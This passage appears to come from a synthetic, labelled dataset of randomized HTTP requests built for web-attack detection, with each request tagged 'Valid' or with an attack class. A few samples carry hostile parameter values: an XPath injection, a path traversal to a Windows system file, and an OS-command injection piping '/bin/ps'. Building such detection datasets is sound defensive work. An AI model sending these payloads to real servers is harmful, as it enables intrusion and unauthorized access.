If-Unmodified-Since: Sat, 27 Jun 09 10:06:11 UTC
If-Match: "fh7i..ERGXzcwvzL"
If-None-Match: *
If-Range: Sun, 15 Jun 08 12:32:02 CET
Max-Forwards: 3740
MIME-Version: 0.9
Pragma: o=iLeomt8
Proxy-Authorization: Digest response="D5B0a7D66ce9CaDc9B7fbC4bBDdCb0cC"
Authorization: Digest cnonce="etej6"
Range: 24-5050
Referer: /wklitM.rar
TE: trailers
Trailer: Connection
User-Agent: Mozilla/7.6 (compatible; Konqueror/2.4; Open BSD i386; lildrexe; lie7qx)
UA-CPU: StrongARM
UA-Disp: 488,0035,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3901x4660
Via: HTTP/3.1 179.108.95.224
Transfer-Encoding: compress
Upgrade: ehlec4/7.5, etieo/5.3, 3cri9/3.1, neAm/6.9, neum/3.4
Warning: 997 www.ios1c.shtml "Bp9SmhaeNdm3asqAoleh" "Thu, 27 Mar 08 03:11:30 GMT"
X-Forwarded-For: 113.55.233.173
X-Serial-Number: 0932215457430057404
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 21851
Start - Id: 7420
class: Valid
POST /ATs6eaM/3DCc/r4H48sXA@IMrk.tiff? HTTP/1.1
Content-Length: 84
Content-Language: jw,rEe7,hkouc
Content-Encoding: deflate
Content-Location: /iro5az.swf
Content-MD5: dFJ0YXpldXRjaWxuRmF5bA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jan 09 04:14:55 GMT
Last-Modified: Tue, 23 Sep 08 20:38:00 UTC
Host: www.lsFugEnhR.org:80
Connection: taopI
Accept: audio/basic;q=0.9, audio/*, application/*;q=0.2
Accept-Charset: x-mac-chinesesimp, iso-10646-ucs-2, windows-1251
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 7.158.25.22
Cookie: goFKQyTzHR=iIs8;otihi=s-MU4l1;asf0qsciehc9=lys5e3e;cS1IDs=ynymWpot
Cookie2: $Version="18"
Date: Fri, 15 Jul 05 08:34:20 GMT
ETag: "CmC6aFzcfOhDTCug"
Expect: sfbao7
From: etjre@ngegAdwy.net
If-Modified-Since: Wed, 03 Nov 04 01:00:02 GMT
If-Unmodified-Since: Sun, 18 Jan 09 08:41:53 CET
If-Match: "-u6YzIOOWogQoM4"
If-None-Match: *
If-Range: Thu, 21 Apr 05 11:59:18 GMT
Max-Forwards: 823
MIME-Version: 3.8
Pragma: tte1eu=rjat
Proxy-Authorization: asue bpcdhTC=a83idrez
Authorization: Digest nc=965bc9eD
Range: 567-
Referer: http://zhebarve.de/trknye/mutmz/stlaerie.php
TE: trailers,chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/3.3 (compatible; MSIE 2.7; Mac OS X; nvireo; hqexe)
UA-CPU: MIPS
UA-Disp: 0192,953,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9649x7067
Via: itsa/1.7 www.ueotx.html:842, 1.8 www.tIa5ntlp.tiff
Transfer-Encoding: ehteob; 1c4e=getrA
Upgrade: ayainh/7.8
Warning: 235 www.eancis.jpeg:3197 "utlefmea" 
X-Forwarded-For: 248.139.237.35
X-Serial-Number: 51648085743746
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aiyTddzIcaryi=v(n&aoeBidh=1526&a5tsisns5dduoB=sr s<o&ohuhltheaetNo=tcistaNa7Iedc

End - Id: 7420
Start - Id: 9030
class: Valid
GET /HNneytIKJw.N/hYmochaFVU/rneisua/aro1Ess9Iwceet.jpeg? HTTP/1.1
Host: www.d5sbIi.ch
Connection: aNiet
Accept: application/*, application/x-tar;q=0.3
Accept-Charset: *
Accept-Encoding: *;q=0.0
Accept-Language: nfextbqa-jelz;q=0.6
Cache-Control: min-fresh=32
Client-ip: 253.16.148.52
Cookie: iye=45746188;acrdi=or |ssnNee
Cookie2: $Version="71"
Date: Fri, 22 Jan 10 17:06:45 UTC
ETag: W/"Y14f4SrMfgaAbDaMHQq"
Expect: fstEe=rleuhia5;lee7msh=iAare
From: asncwO@udwr.ch
If-Modified-Since: Thu, 25 Mar 04 02:09:04 CET
If-Unmodified-Since: Tue, 16 Oct 07 03:10:56 UTC
If-Match: "ujr.bBPsxujW9is"
If-None-Match: "K5b1yX_5s@_BiLao7-X"
If-Range: *
Max-Forwards: 84
MIME-Version: 0.6
Pragma: xw=D0tumaa
Proxy-Authorization: Basic bzdtcnRmeWk6dW1vU0xlbW8=
Authorization: azal cnoOeee=eroD0h0
Range: 5-300138,73-
Referer: /e6s9n5/fpfyf/mtgMwn/tl6c6r/htweps.swf
TE: trailers
Trailer: Accept
User-Agent: Mozilla/2.3 (Windows; U; Win98 4.9; mt-nn; rv:1.2.1) Gecko/99478819
UA-CPU: 68000
UA-Disp: 7331,790,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 454x187
Via: FTP/8.3 14.168.170.28
Transfer-Encoding: deflate
Upgrade: mtret/0.1
Warning: 289 www.mbxzf4og.jpg "eAnhnsteieeelokc4" "Sun, 04 Jun 06 15:45:48 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 92954758156
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9030
Start - Id: 3466
class: Valid
GET /7JTAbEg18jRV/soa5/m.JMNkyRUbetweenl8phpE1/95Fdlreloer/script.c4P/zsrnntwanr.png? HTTP/1.1
Host: www.tlq6.be
Connection: close
Accept: image/png, audio/*, audio/basic
Accept-Charset: isiri-3342, ks_c_5601-1987, euc-tw;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *
Cache-Control: no-cache
Client-ip: 2.156.108.121
Cookie: ehintinmn2pmjge=aavRddiv;UeYt=as;ty=srNI8tonae;emr=rusinnnYarlikel9a
Cookie2: $Version="18"
Date: Fri, 09 Apr 04 14:56:28 UTC
ETag: "AN4.nNkM_srLbHg"
Expect: get3ir=dctzsN
From: rnmnhIO@9tEdmhfosy.fr
If-Modified-Since: Sun, 27 Feb 05 04:24:47 GMT
If-Unmodified-Since: Tue, 16 Nov 04 09:18:18 CET
If-Match: "e@CntOT5omPEQMDm7E"
If-None-Match: *
If-Range: Mon, 25 Aug 08 06:53:20 GMT
Max-Forwards: 240
MIME-Version: 2.9
Pragma: hAierzi='o6sMrtb'
Proxy-Authorization: r5le hmnr=ywltxE
Authorization: 0Yyaa4 eefl=sh9s0r3n
Range: -535,169-
Referer: /inyhrc/ogc3e/yildaeri/lTone.msf
TE: gzip,chunked;q=0.9
Trailer: User-Agent
User-Agent: Mozilla/8.6 (compatible; MSIE 3.0; Win 9x; fteqhlexeN; 1ars2u)
UA-CPU: MIPS
UA-Disp: 086,5443,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 8177x498
Via: HTTP/0.7 230.248.163.186, FTP/2.6 www.kdhohL.shtml, 6.3 155.73.214.244
Transfer-Encoding: fonud
Upgrade: ei6/5.2, fRh/0.7, hi06e/2.4, gae/7.2, tjo/3.1
Warning: 418 www.2tqbes.html "2mrk" "Wed, 11 Mar 09 16:10:04 GMT"
X-Forwarded-For: 175.189.142.174
X-Serial-Number: 1870735508221770189
----: --------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 3466
Start - Id: 2788
class: Valid
GET /nelJxgIbotal/iw@K8exMPWS6oPD6X.html?zz--b=wca&ieashmdsw9=tsEuperln&dssohkjs=zs&ae3d=rhao4&e7so0ss=6525830&A6KRs=aHIS&rltwuAmehoa=offG5w1g%40 HTTP/1.1
Host: www.dtrdrokR4c.net
Connection: otefit
Accept: */*
Accept-Charset: x-mac-greek;q=0.3, windows-1258;q=0.2, windows-1255
Accept-Encoding: deflate, compress, compress;q=0.1, gzip
Accept-Language: e-8, At2-stdbmEig, 6e-eavei, eeopAs-tpieed
Cache-Control: min-fresh=21
Client-ip: 202.208.156.40
Cookie: rtm=893;0cP2o_MdeleteWUP=Pf;eaeoMspoenndunt=7coni;d9EYouhcalh0dr=ua4a4logretb;ad7gRa=tfl0vaE]thclrsanu
Cookie2: $Version="78"
Date: Thu, 09 Mar 06 22:40:47 UTC
ETag: "Ddx8ftvn5TLLcJFhel"
Expect: tdtn
From: tdhre@eo8i9.de
If-Modified-Since: Tue, 25 Oct 05 08:27:40 CET
If-Unmodified-Since: Tue, 19 Sep 06 03:28:48 UTC
If-Match: "-xe@Nz4@uc_AXj38Nl."
If-None-Match: *
If-Range: "XsQFzigJi@I6DvXl"
Max-Forwards: 1
MIME-Version: 5.1
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: leAtd gaxt=n4pbnae
Range: 653260-,8-79,061108-10
Referer: http://www.c9y7tnis.de/Inwd/stn6ui/a86n/thw63i.php4
TE: gzip,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 8.4; l5-gt; rv:1.7.0) Gecko/65310040
UA-CPU: Sparc
UA-Disp: 604,2690,8
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 944x3965
Via: HTTP/4.1 224.236.38.202, 8.7 93.57.155.209, oln/2.8 www.b2gtri.js
Transfer-Encoding: deflate
Upgrade: Sbhjos/1.1
Warning: 413 www.5eltrael.css "tyftz8" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2788
Start - Id: 19019
class: Valid
GET /sinJdn5edg2nzii/Cq10JalXJX/sb0S8Hitjeoeaas/nI0JCNXOGXldmRlEj6Sw.sh? HTTP/1.0
Host: 160.131.73.89
Connection: e3tol2o
Accept: */*;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: gzip;q=0.9
Accept-Language: en-wni, pnu-zvlsia;q=0.1, wepTsz-wdgafU, zmt-wgt;q=0.0, snei2h-7sne9M9e
Cache-Control: max-stale
Client-ip: 203.235.99.136
Cookie: eie=emJPqa1
Cookie2: $Version="62"
Date: Thu, 23 Sep 04 22:49:11 UTC
ETag: W/"Kbn.rqTEpMB4ZJf"
Expect: 100-continue
From: aOmxo@r1ehet.biz
If-Modified-Since: Wed, 31 Aug 05 21:54:48 UTC
If-Unmodified-Since: Tue, 06 Nov 07 20:28:58 CET
If-Match: "0ZotTZt-X2hRw4fB@3l"
If-None-Match: *
If-Range: Wed, 27 Aug 08 07:57:47 UTC
Max-Forwards: 9329
MIME-Version: 8.1
Pragma: ldezo=mH
Proxy-Authorization: Digest response="d3EF6cFec42B33b63bdA11EE1B259cF4"
Authorization: Digest response="Cb0d27d861B4F0Aa3Be52a5CC1b6b34C"
Range: 970214-
Referer: http://www.wbaea.org/78veoilr.js
TE: gzip
Trailer: If-Match
User-Agent: Mozilla/4.3 (X11; U; Open BSD i586 7.0; ne-a3; rv:3.3.7) Gecko/17675537
UA-CPU: MIPS
UA-Disp: 8898,8815,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 890x6831
Via: uirddq/8.6 www.asueSt.htm:323, HTTP/9.5 157.66.103.151:499
Transfer-Encoding: deflate
Upgrade: tsnbwM/6.3, tlua8/1.6
Warning: 763 www.etbGe1.js "ot6snleog4Ao3avndro" "Mon, 18 Jun 07 08:21:39 GMT"
X-Forwarded-For: 144.31.247.88
X-Serial-Number: 27260320301
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19019
Start - Id: 15811
class: Valid
GET /r1si8etearwEr/eSrRV@zOU3jLQjl/Ehomeu_D_EhCF/t5hF/g25V8Kh3zz/eScrren2f9tz1.gif?qDQy0F6L=nmcIph1&eCrnoae9Uhm=bCyT1KHp9Z0d HTTP/1.1
Host: 126.211.56.112:80
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.8, euc-cn
Accept-Encoding: *
Accept-Language: le-9;q=0.3, not5uie2-8scvoa
Cache-Control: no-transform
Client-ip: 204.119.108.46
Cookie: ctam0vogu0t1kui=46583
Cookie2: $Version="1"
Date: Tue, 11 Nov 08 23:39:48 CET
ETag: W/"4g.i8cxBwn8B1MSmy"
Expect: 100-continue
From: nsmr@ahaei.uk
If-Modified-Since: Wed, 18 Feb 04 18:08:51 UTC
If-Unmodified-Since: Fri, 18 Aug 06 08:30:22 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 10 Sep 05 04:11:23 UTC
Max-Forwards: 350
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Digest username="0nSl"
Authorization: Digest qop=yMwzne
Range: -0,-3358,3280-395
Referer: http://www.cRttl0e.uk/2aue.asmx
TE: trailers,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/5.0 (Windows; U; WinNT 6.4; im-ar; rv:4.6.8) Gecko/49525325
UA-CPU: StrongARM
UA-Disp: 3907,1004,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 132x8371
Via: FTP/5.7 www.Jodw6.js, 2.8 126.33.125.169:78068
Transfer-Encoding: compress
Upgrade: iercSi/3.4, rnry/0.4, onpiw/4.8, bhtr/3.8
Warning: 193 www.losl.png "jmxogwrexo6" 
X-Forwarded-For: 82.201.200.90
X-Serial-Number: 711196444045692
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15811
Start - Id: 20735
class: Valid
GET /Yinjndsc5.js?titiyemet=3Ec7&utrtrae=e8tlarwPftseEknh&hd5xwaeetiI43H=73&olditeld=1dlnn3hfnmocha&dhsiske=p4acceptdraSm&hohraVtei=e%40vCOL1OZ_&2qdOu7=4&thd4=%24noalo%29me%5D5eXy&Ihanao=me9idIc4&nen9e5C=cg0heoshea7l&it6ahLls=openonqS&fei=servicesht&nwN=noorrhl5n HTTP/1.1
Host: 238.32.210.196:2974
Connection: keep-alive
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: s4lulnu-sar;q=0.1, a9v-De3rmx;q=0.9, is-exui
Cache-Control: max-stale=1531
Client-ip: 152.95.254.90
Cookie: 8swacisi2s1o=hk4sPcXfF;rszlithh=38;Raeid=uatIn2whrniqpat;isibehntwiW=dtaa
Cookie2: $Version="9"
Date: Mon, 28 Jan 08 01:40:08 UTC
ETag: "1DgOo2vdxETCOqChv"
Expect: Eihnefr
From: edarepsn@mOihgon.org
If-Modified-Since: Tue, 18 Mar 08 13:18:39 UTC
If-Unmodified-Since: Tue, 03 Apr 07 09:50:39 UTC
If-Match: "JXzFf@E2Ik2gCtVO_VQz"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.4
Pragma: p=eOu9o3u
Proxy-Authorization: Digest nc=ce10aCbC
Authorization: oM0rio lA2het=ihmi1irx
Range: -497842,992988-5164
Referer: /doecuSle/soefli.jsp
TE: trailers,trailers,trailers
Trailer: If-Range
User-Agent: Mozilla/7.1 (Windows; U; WinNT 4.1; Hr-oH; rv:0.4.0) Gecko/73515003
UA-CPU: MIPS
UA-Disp: 4789,4101,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 413x553
Via: 0.7 144.31.190.113, 3.1 232.168.112.139
Transfer-Encoding: deflate
Upgrade: log/9.9, neIir/5.4
Warning: 447 156.37.10.161 "oa0itiorbaoej2" 
X-Forwarded-For: 148.116.239.129
X-Serial-Number: 43053635016402500046
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20735
Start - Id: 49984
class: XPathInjection
GET /lnstotfeUhseetm/wf43rx1DEGm/wdmqm4eorjYaltBwonSe/QZDyG7T8%u8nQ/p-6rC2Vzl.D3BuW.dll?gvaeN5oMitXg=iafotdz%27++++or+++%28i+++%3C+count%28oonLr%2Fchild%3A%3Atext%28%29%29+++++and++j+++++%3C+++count%28vor6r%2Fchild%3A%3Acomment%28%29%29++++and++++k+%3C++++count%28eaa%2Fchild%3A%3A*%29+++%29+++++or+%27ehoo%27+++%3D++++%27+++ohh3%27++++or&IzDfnd=aj%40yonnl HTTP/1.1
Host: 68.24.135.73
Connection: SoslCre
Accept: video/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: eb-9le, g2-1T0;q=0.0, eYhehd3-ii;q=0.8, m0aieXeh-t0iu
Cache-Control: no-store
Client-ip: 237.62.233.210
Cookie: g3SyiScayA=rC-LQtSPqrAX;Muqarpwh5iLsc=yojjm;_positionEpGJV4=iylreplace;a1se=orCas_fs5Z3C;mif=Eiiito0dpa
Cookie2: $Version="9"
Date: Thu, 03 Aug 06 07:22:27 GMT
Expect: 100-continue
If-Match: "J1aFHMN7HsDT-72_STaK"
Max-Forwards: 8031
Referer: /05e5etme/cwriOoY/Te7tzDts/xdonbti.pdf
TE: trailers
User-Agent: Mozilla/8.1 (compatible; oyyice; Linux i386; aSdn)
UA-Pixels: 0803x6416
Via: FTP/7.7 www.tn7c1eig.css, FTP/3.3 www.isDr.js, 4.1 www.Eyuz.htm

null

End - Id: 49984
Start - Id: 45372
class: PathTransversal
POST /h5BmJD9HPwAaKqJR-V@/6qpS5i9y/iaflreTne21e/rH-WaKxqO.jpeg? HTTP/1.0
Content-Length: 201
Content-Language: btsysl,tSihwng,vn
Content-Encoding: deflate
Content-Location: /iwtioyr.dll
Content-MD5: YXJuaHJFZWFlMHFvbXRhZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 May 04 04:57:24 GMT
Last-Modified: Sun, 27 Nov 05 22:51:08 GMT
Host: 46.112.68.213
Connection: close
Accept: text/*;q=0.5, application/*, audio/*;q=0.8
Accept-Charset: iso-8859-8-i;q=0.0, x-mac-icelandic;q=0.0, windows-1258;q=0.6, iso-8859-2;q=0.6
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: max-stale=5
Client-ip: 219.120.83.225
Cookie: cehjohyhOooh=7;Bha=eb9Q;diEn=928;rKGjoh=oepositionc;kork8Negoh0l=$ztl
Cookie2: $Version="96"
Date: Fri, 27 Aug 04 11:54:29 GMT
ETag: W/"B9SBjm1lLCiZpvnPjtU"
Expect: 100-continue
From: meaol@shaU.gov
If-Modified-Since: Sun, 26 Apr 09 02:03:38 GMT
If-Unmodified-Since: Sun, 23 Dec 07 24:30:02 UTC
If-Match: "8bl_RjSClDPqSdpag"
If-None-Match: *
If-Range: Thu, 19 Mar 09 16:00:20 UTC
Max-Forwards: 0452
MIME-Version: 4.4
Pragma: eel='sy'
Proxy-Authorization: Basic c2V1cnRtcjpkZTF1
Authorization: Digest opaque="exnaahng"
Range: 74377-10,-135
Referer: /t6enrdha/ragnOiop/nwtr5l/ncvet/Nuunnos.jpg
TE: trailers,trailers,trailers
Trailer: Transfer-Encoding
User-Agent: nivepiiDhAitio
UA-CPU: Sparc
UA-Disp: 9353,7001,16
UA-Color: color8
UA-Pixels: 0455x0884
Via: 1.0 40.146.129.164, FTP/3.4 3.243.189.169, ooe/1.3 33.111.197.167:3324
Transfer-Encoding: compress
Warning: 033 102.101.187.47 "senpv3nMsOiNryeagcPt" 
X-Forwarded-For: 42.158.87.228
X-Serial-Number: 154959396
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Yvunv=aedof9H6C@&gtodsEav5ft=[&bEst=jQ5-CoHggQ&csssUdohvzo1L=erfSfiVoQ&ey=h1niewxhrlfXshowcd&dodntA=pQ9&_27sAzRG0=../../../../../../../../../WINNT/autoexec.bat&teoxodsl=nclcgjSs

End - Id: 45372
Start - Id: 43493
class: OsCommanding
GET /bvaotsEdotonh.html?wi=iep9&Satnabrosa7r=58694901&ifidmn=%2Fbin%2Fps%2500++++%7C&rndweqaihd4=8176085&SJl9._J=7977220&8M-7kPQR3Q=7h HTTP/1.0
Host: 225.57.247.54
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: only-if-cached
Client-ip: 247.196.108.175
Cookie: aasosih=eOOVMNx_W;4kettih9H=75385750;rnemwrafch=toktIa Ioo1cawn
Cookie2: $Version="514"
Date: Wed, 19 Nov 08 11:19:33 UTC
ETag: W/"rzo0kdvN8ivh2ko._H"
Expect: 100-continue
From: fxtr5UaD@nYeuiAuhet.net
If-Modified-Since: Tue, 20 Oct 09 01:53:04 GMT
If-Unmodified-Since: Sat, 11 Dec 04 08:15:53 GMT
If-Match: *
If-None-Match: *
If-Range: "7yCZLPgOBjNDzS-j"
Max-Forwards: 00
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: NTLM b2NpT2hvcW1vN2ljcXB0Z25oZXNzbUVvN2Vpc2FFcmRBc2RuaFQ=
Authorization: NTLM c3hyaU5lc3JmeWV0dmVheW1oZXRudGhlOGNSaEVQYWd0YjdsaGdpdHNlZXMzcnFv
Range: 32-61,4386-85
Referer: http://lsee.gov/ZyAyt/kTdd9ec.jpeg
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/0.9 (Machintosh; U; PPC 2.3; pn-ri; rv:2.9.8) Gecko/99789946
UA-CPU: Sparc
UA-Disp: 777,376,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2941x889
Via: 6.4 www.eUtwttsn.jpg, 4.1 155.99.83.56
Transfer-Encoding: identity
Upgrade: oifjE/4.1, rq7t/9.9, yvbed9/8.5
Warning: 030 157.207.32.92 "imad6oletnEdRcinytly" "Thu, 14 Apr 05 13:21:07 CET"
X-Forwarded-For: 137.226.116.122
X-Serial-Number: 5600215
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43493
Start - Id: 20157
class: Valid
GET /d84wC4jgRZg1YWFCU/wli/erYtuae/eSeesiexurciGotmc8h/neglti6tGg3itme/YqGKEUtnulln/tue0icswUEzdi/iDJNthD91mwpVxGUXZh_/e0q-yQ.0BcbyXvQf.tiff?passwdQC23YS=08487882&1bEP8H=7ccr2q&af=oBXgv&spoyelIEe1=bknqba HTTP/1.0
Host: www.egedxeYo.gov
Connection: close
Accept: video/quicktime, audio/x-wav;q=0.1
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 127.101.234.36
Cookie: ne4oEsn3=tnieT;edDed1Deiet=SimTlycedoic;9die2tnr0ew=nb6ime;W0lv96YV=aioBtdrsEswtmpp5;i5=dbCa;oeah29tsyboceie=4
Cookie2: $Version="74"
Date: Tue, 31 Aug 04 14:29:27 UTC
ETag: W/"e79xNrsSJ4l28i@mqK"
Expect: 100-continue
From: sb62@aupq5s0rh.st
If-Modified-Since: Wed, 16 Jan 08 13:27:45 GMT
If-Unmodified-Since: Thu, 22 Dec 05 21:50:09 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 73
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: srrnsA krEeR=Tsg3ode
Authorization: ce1wca ieonsoet=Nspb
Range: 365749-,607-065
Referer: /Tnej/hSct/ovnej.php
TE: deflate;q=0.7
Trailer: Warning
User-Agent: 8yetn/8.3
UA-CPU: PowerPC
UA-Disp: 972,951,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 2245x9664
Via: HTTP/4.3 www.aeegor.gif
Transfer-Encoding: deflate
Upgrade: ttd5j/9.6, zlM/2.4, xdtc/7.0
Warning: 804 223.86.45.215 "nulraOi9titRoel" "Wed, 09 Dec 09 07:48:07 CET"
X-Forwarded-For: 108.223.104.239
X-Serial-Number: 818940289037897740
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20157
Start - Id: 4413
class: Valid
PUT /icUJ/sfQms-cJbB_95306FbpS.cfm? HTTP/1.0
Content-Length: 149
Content-Language: amdn,up3S,tna
Content-Encoding: compress
Content-Location: /e81btrs.aspx
Content-MD5: dGlpbnNMaGlpYWVlc3Npag==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Jun 08 19:02:44 GMT
Last-Modified: Sun, 20 Jun 04 15:12:48 CET
Host: 80.201.119.0
Connection: close
Accept: */*;q=0.9
Accept-Charset: us-ascii;q=0.9, x-mac-chinesesimp, x-mac-arabic, cp-932;q=0.3
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-transform
Client-ip: 106.75.156.151
Cookie: n2osps2qetmd=6YvIK;gm=ot(reat?gsgv;jh6moepeilleE=8
Cookie2: $Version="640"
Date: Sat, 24 Mar 07 14:56:42 UTC
ETag: W/"_BZ7hFXiVIQmxID"
Expect: ttlcichb
From: tsdede@Tvcnhj.st
If-Modified-Since: Wed, 30 Nov 05 08:41:15 CET
If-Unmodified-Since: Fri, 03 Apr 09 07:19:27 CET
If-Match: "2-1F8tCaMUFZet27DEU7"
If-None-Match: *
If-Range: Wed, 08 Nov 06 19:46:00 UTC
Max-Forwards: 171
MIME-Version: 7.9
Pragma: 8trgfUyg='laue'
Proxy-Authorization: NTLM ZHNMc09kckVEZTduYnJkaXRpa3NlOXlobnRudEFpaGxsbWllUzFlZTdvb3Fx
Authorization: Basic N2lhSDpzOTdobVJj
Range: 764193-473
Referer: http://www.k3u2Cz2s.org/w06e/dlp1Iwfi/aCeiOa3/dstld9.gif
TE: gzip;q=0.6
Trailer: Host
User-Agent: Torsirt (eEXjVO; ephBG8mV2)
UA-CPU: Sparc
UA-Disp: 3339,068,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 6849x3464
Via: hron/6.5 145.205.138.212, FTP/9.1 162.200.120.44, qcclgd/8.7 www.Ahasfe.shtml:06765
Transfer-Encoding: fAenee
Upgrade: aw7qe/7.0, Owgd/5.7
Warning: 486 51.49.137.87 "yuaievttaTtrretzb0" 
X-Forwarded-For: 92.174.150.38
X-Serial-Number: 854134034
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

BH2aEhu91aX=aCioufx&hhag6ehf=28&UFAH7insertE4=e78&xcildTei=aae0doazpeaPeci<&aahealuyteoohae=iHre4&oovlutFsehz=8&qNn=>doegjr 0a4connect eaee(>

End - Id: 4413
Start - Id: 17826
class: Valid
GET /ttiExpsdRhroxosn0n/iioijfUqoat26tstsn/aE-gnL@giR/aPzTUM.FfCNQKef-6E/lam9htudla/eH2ubO3BEgz-3_@Zr/ak6WBrk2eGJPx./oZw6gDa/kkvO_V5f6F99ll9.aspx?nvNafh=natteh%3Dy%3CaeE&rlmochaoUErC5N=3389&clem85tiuae=8121464&oi=o2ZRdfj9OLwe&J7AjYhPGY=4853617626&dzl5hw=e1&-vcmd9H=305251306&4D.-Z=09059732&aeQ8aeosae=ygOhvta&emnwsao8=rwp-S&Aropst11cy=oopsaebins6p9astdd HTTP/1.1
Host: www.fnaiiri.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1258;q=0.8, iso-8859-7;q=0.4, x-mac-japanese
Accept-Encoding: 
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 237.190.53.255
Cookie: cvbtimgrqtrve=62021;loVssGiu=05663822;3dfdede=a@pLXZ_-;eseojedevIm=1
Cookie2: $Version="799"
Date: Thu, 14 Oct 04 05:34:20 CET
ETag: "8BT5Ni58jyRMhwIlGa"
Expect: ugelm
From: bhodzdea@setynert.net
If-Modified-Since: Tue, 21 Nov 06 16:44:54 GMT
If-Unmodified-Since: Wed, 03 Mar 10 23:56:00 UTC
If-Match: *
If-None-Match: "GigkyJliRdPHl.FH"
If-Range: Fri, 13 Feb 04 15:42:09 UTC
Max-Forwards: 1876
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest nonce
Range: 4-20674
Referer: http://ouhapha.it/Htndtt8/tvctSn.pl
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/3.7 (X11; U; Solaris 2.3; sE-3u; rv:1.7.3) Gecko/01634502
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 5851x4890
Via: 0.3 www.ctrenlrh.css:4, 0.4 123.232.222.40, HTTP/2.3 52.238.68.151
Transfer-Encoding: deflate
Upgrade: Wlr/6.5, mnotTs/5.2, da54o/9.9
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 65.146.203.44
X-Serial-Number: 168409741956
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17826
Start - Id: 33584
class: Valid
PUT /f9o1y/tdocumentrvoOt6.php? HTTP/1.0
Content-Length: 284
Content-Language: d,pe9nr
Content-Encoding: gzip
Content-Location: http://3CgAoez.be/aiaajjm/tcha.jsp
Content-MD5: cmlvZWl6MXRjYWRnZWJoZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 04 22:19:58 UTC
Last-Modified: Mon, 21 Apr 08 18:55:00 CET
Host: www.n8fdntge4e.org
Connection: mewZshe
Accept: video/*, video/quicktime;q=0.3, application/x-tar
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.0, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 17.174.176.26
Cookie: trjedcumtvtiwo=tejnUA8E6p2t;nssvdmbmc=e.ziBTaM.;kXXz3u=teY;tgne=\pjhlink
Cookie2: $Version="998"
Date: Mon, 16 Feb 09 21:35:40 CET
ETag: W/"QI_U8iQ-IBKYytc1"
Expect: 100-continue
From: HEilye@Ehze.com
If-Modified-Since: Mon, 28 Jun 04 13:05:19 CET
If-Unmodified-Since: Fri, 28 Mar 08 05:06:08 GMT
If-Match: "DPuVbWNaKU_5rNZ"
